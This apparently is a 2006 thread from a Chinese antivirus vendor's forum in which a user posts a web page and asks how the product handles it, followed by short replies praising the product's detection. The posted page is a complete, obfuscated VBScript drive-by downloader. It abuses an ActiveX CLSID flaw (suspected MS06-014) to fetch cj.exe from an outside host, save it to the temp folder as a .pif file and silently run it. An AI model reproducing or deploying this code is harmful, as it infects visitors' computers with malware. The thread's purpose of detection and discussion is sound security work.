Board logo

标题: 未知道这种情况微点怎么处理 [打印本页]
作者: sunya     时间: 2006-12-1 09:37    标题: 未知道这种情况微点怎么处理

CODE:  [Copy to clipboard]
<html>
<body>
<script type="text/jscript">
function init() {
document.write("<center><font color=red></font><center>");}
window.onload = init;
</script>
<script language="VBScript">
on error resume next
aurl_0="http://www.ip321.cn/cj.e"
aurl_0=aurl_0+"xe"
mbb41m="A"
kbb22q="d"
sbb43e="odb.Stream"
nss31q=""
iss62u="M"
lss43n="icrosoft.XMLHTTP"
tcc81w="clsid:BD"
tcc12u="9"
fcc63s="6C556-65A3-11D0-983A-00C04FC29E36"
ooo61n="Scri"
soo02o="p"
soo43f="ting.FileSystemObject"
ejj81c="obj"
kjj82h="e"
tjj23d="ct"
ocl11t="class"
qcl22c="i"
ycl73n="d"
f5sbs3=nss31q&iss62u&lss43n
i4b4br=mbb41m&kbb22q&sbb43e
h0cqc2=tcc81w&tcc12u&fcc63s
e7o6or=ooo61n&soo02o&soo43f
r1jgj2=ejj81c&kjj82h&tjj23d
b4l4ln=ocl11t&qcl22c&ycl73n
Set p1d1fs = document.createElement(r1jgj2)
p1d1fs.setAttribute b4l4ln, h0cqc2
set i3f4n = p1d1fs.createobject(e7o6or,"")
set p2x2l = p1d1fs.CreateObject(f5sbs3,"")
set q4sl7 = p1d1fs.CreateObject(i4b4br,"")
set ste3mp = i3f4n.GetSpecialFolder(2)
q4sl7.type = 1
d2get="GET"
p2x2l.Open d2get, aurl_0, False
p2x2l.Send
t5L_hy50= "L_hy50.pif"
t5L_hy50= i3f4n.BuildPath(ste3mp,t5L_hy50)
q4sl7.open
q4sl7.write p2x2l.responseBody
q4sl7.savetofile t5L_hy50,2
q4sl7.close
</script>
<script language="VBScript">
on error resume next
mbb41m="A"
kbb22q="d"
sbb43e="odb.Stream"
nss31q=""
iss62u="M"
lss43n="icrosoft.XMLHTTP"
tcc81w="clsid:BD"
tcc12u="9"
fcc63s="6C556-65A3-11D0-983A-00C04FC29E36"
ooo61n="Scri"
soo02o="p"
soo43f="ting.FileSystemObject"
ejj81c="obj"
kjj82h="e"
tjj23d="ct"
ocl11t="class"
qcl22c="i"
ycl73n="d"
yse51w="Shell."
lse42x="A"
mse43s="pplication"
f5sbs3=nss31q&iss62u&lss43n  '組合成Microsoft.XMLHTTP
i4b4br=mbb41m&kbb22q&sbb43e  '組合成Adodb.Stream
h0cqc2=tcc81w&tcc12u&fcc63s  '組合成clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
e7o6or=ooo61n&soo02o&soo43f  '組合成Scripting.FileSystemObject
r1jgj2=ejj81c&kjj82h&tjj23d  '組合成object
b4l4ln=ocl11t&qcl22c&ycl73n  '組合成classid
l0ehe0=yse51w&lse42x&mse43s  '組合成Shell.Application
Set p1d1fs = document.createElement(r1jgj2)  '相當於HTML標簽<object>
p1d1fs.setAttribute b4l4ln, h0cqc2    '給object加上屬性。。。。。。接下來就不用多說了。。。
set i3f4n = p1d1fs.createobject(e7o6or,"")
set x1qa8 = p1d1fs.CreateObject(l0ehe0,"")
set ste3mp = i3f4n.GetSpecialFolder(2)
t5L_hy50= "L_hy50.pif"
t5L_hy50= i3f4n.BuildPath(ste3mp,t5L_hy50)
x1qa8.ShellExecute t5L_hy50,"","","open",0
</script>
</body>
</html>
</script>
[ Last edited by sunya on 2006-12-1 at 10:02 ]
作者: sunya     时间: 2006-12-1 10:03
都看看
作者: v6hacker     时间: 2006-12-2 00:55
好明显。这是个网马源代码了,,是不是MS06014的????一个字。杀!!!!
作者: Legend     时间: 2006-12-2 13:43
经官方测试该脚本自动到网络地址http://www.ip321***.cn/cj.exe下载cj.exe文件然后执行并会删除自身,微点可以拦截并处理成功。
附件 1: 11.jpg (2006-12-2 13:43, 402.01 K,下载次数: 24)


作者: weizg     时间: 2006-12-3 10:37
呵呵,强吧
作者: fujianwzh     时间: 2006-12-3 10:54
我的微点对付了类似的N个网马了。。。一概杀无赦
作者: li0171241     时间: 2006-12-3 11:45
表现还不错的,支持微点
作者: zjf     时间: 2006-12-5 21:52
不错哦!!
作者: huolongwuai     时间: 2006-12-12 19:08    标题: 看得笑,顶微点

看得笑,顶微点



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn